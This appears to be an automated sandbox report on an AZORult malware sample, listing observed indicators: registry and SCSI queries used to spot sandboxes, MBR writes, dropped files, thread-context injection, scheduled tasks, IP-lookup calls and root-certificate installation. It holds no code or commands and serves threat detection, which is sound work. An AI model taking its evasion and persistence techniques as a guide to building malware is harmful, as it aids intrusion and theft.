azorult | a86a46b09a2e8d7a353c868327c2a0300f0a71bc76654f6b5ae95bb0676ee73c

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
200	ipinfo.io
395	ipinfo.io
7557	ipinfo.io
22204	ip.anysrc.net
112	ipinfo.io
116	ipinfo.io
375	ipinfo.io
5429	ipinfo.io
12426	ipinfo.io
13064	ipinfo.io
35	api.ipify.org
83	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\SET1DC2.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\SET1DC2.tmp	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\SET1DC0.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\SET1DC0.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\SET1DC1.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\SET1DC1.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7fdcb447-30cf-5d4e-bedd-232c23e15d12}\tap0901.cat	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
208	Setup.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3968 set thread context of 3920	3968	7502.tmp.exe	92
PID 3916 set thread context of 2932	3916	C0CA61A12E4C8B38.exe	106
PID 3916 set thread context of 2900	3916	C0CA61A12E4C8B38.exe	121
PID 3916 set thread context of 2900	3916	C0CA61A12E4C8B38.exe	126
PID 4888 set thread context of 4208	4888	Venita.exe	205
PID 4896 set thread context of 1084	4896	whiterauf.exe	208

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-QAND4.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-DCBMV.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-R0TTG.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-3L32S.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-C8MSO.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-5NKTP.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\whiterauf.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-3NAKM.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-RU4ME.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-NRFNC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-DBSR4.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-5MNC2.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-V2GRE.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\is-LKGSD.tmp	5injklgbowl.tmp
File created	C:\Program Files\KLB8YAHJ87\uninstaller.exe.config	vk0o3uwmyy2.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-GB5P6.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-SPDLH.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-3NI3G.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-ETFJU.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-7746L.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-D74FG.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files\KLB8YAHJ87\cast.config	KLB8YAHJ8.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-KLNF3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-0L5ST.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-RBA9O.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-9CT95.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\5.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Abbas.exe	chashepro3.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-GJ4VU.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-1EQ4E.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-IC97I.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\JCleaner\is-TNJ9G.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\MaskVPN\is-8PD2M.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-QSUDT.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9K9NE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-MMUJT.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-5B22E.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\Venita.exe	chashepro3.tmp
File created	C:\Program Files (x86)\JCleaner\is-UTCSN.tmp	chashepro3.tmp
File created	C:\Program Files (x86)\MaskVPN\is-7S6AC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-NCVAS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-531S5.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-8H0AS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-MC3Q8.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\is-A6TQN.tmp	Setup.tmp
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\is-U11NB.tmp	Setup.tmp
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 37 IoCs

pid	pid_target	Process	procid_target
5016	4424	WerFault.exe	139
5096	4424	WerFault.exe	139
5080	4424	WerFault.exe	139
5212	4424	WerFault.exe	139
5420	4424	WerFault.exe	139
5560	4424	WerFault.exe	139
6076	4424	WerFault.exe	139
6140	4424	WerFault.exe	139
5224	4424	WerFault.exe	139
4304	4424	WerFault.exe	139
3160	6500	WerFault.exe	361
6752	6500	WerFault.exe	361
5724	6500	WerFault.exe	361
6808	6500	WerFault.exe	361
6020	6500	WerFault.exe	361
5236	6500	WerFault.exe	361
6648	6500	WerFault.exe	361
6804	6500	WerFault.exe	361
4576	6500	WerFault.exe	361
4308	6200	WerFault.exe	427
7164	6200	WerFault.exe	427
2252	6200	WerFault.exe	427
5008	6200	WerFault.exe	427
7252	6200	WerFault.exe	427
3244	6200	WerFault.exe	427
3820	6200	WerFault.exe	427
8248	6200	WerFault.exe	427
8296	6200	WerFault.exe	427
3232	7484	WerFault.exe	493
9164	7484	WerFault.exe	493
4928	7484	WerFault.exe	493
528	7484	WerFault.exe	493
6824	7484	WerFault.exe	493
7232	7484	WerFault.exe	493
8700	7484	WerFault.exe	493
7832	7484	WerFault.exe	493
6384	7484	WerFault.exe	493

Checks SCSI registry key(s) 3 TTPs 28 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7502.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7502.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6092	schtasks.exe
4940	schtasks.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
8440	timeout.exe
4784	timeout.exe
6260	timeout.exe
6072	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 11 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	7731	Go-http-client/1.1
HTTP User-Agent header	7741	Go-http-client/1.1
HTTP User-Agent header	434	Go-http-client/1.1
HTTP User-Agent header	440	Go-http-client/1.1
HTTP User-Agent header	449	Go-http-client/1.1
HTTP User-Agent header	450	Go-http-client/1.1
HTTP User-Agent header	2150	Go-http-client/1.1
HTTP User-Agent header	7625	Go-http-client/1.1
HTTP User-Agent header	441	Go-http-client/1.1
HTTP User-Agent header	446	Go-http-client/1.1
HTTP User-Agent header	7725	Go-http-client/1.1

Kills process with taskkill 7 IoCs

evasion

pid	Process
4440	taskkill.exe
5372	TASKKILL.exe
7000	taskkill.exe
7028	taskkill.exe
4256	taskkill.exe
2936	taskkill.exe
3912	taskkill.exe

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
